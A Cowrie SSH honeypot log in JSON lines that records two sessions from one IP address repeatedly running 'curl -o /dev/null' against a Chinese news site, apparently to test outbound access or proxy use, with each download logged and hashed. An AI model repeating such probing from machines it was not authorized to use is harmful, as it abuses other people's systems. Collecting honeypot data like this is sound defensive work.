{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.275938Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.277130Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.280668Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.282682Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.294844Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.295830Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.311576Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.318417Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.319860Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.321445Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.330832Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.331765Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.345144Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.346814Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.358972Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.360012Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.363206Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.369492Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.370694Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.371421Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.384951Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.397269Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.398382Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.406018Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.406968Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.410156Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.412255Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.419832Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.421370Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.422373Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.437638Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.438795Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.447321Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.448322Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.468353Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.479436Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.480443Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.487308Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.488286Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.499543Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.521960Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.523016Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.524511Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.527366Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.528219Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.530287Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.549278Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.551132Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.555118Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.562886Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.563851Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.566258Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.567178Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.596758Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.603403Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.604367Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.606722Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.607483Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.609524Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.635357Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.637029Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.646777Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.647745Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.651259Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.652702Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.666516Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.672364Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.683904Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.686525Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.687901Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.688700Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.691137Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.692188Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.713762Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.726870Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.727833Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.729543Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.730369Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.738395Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
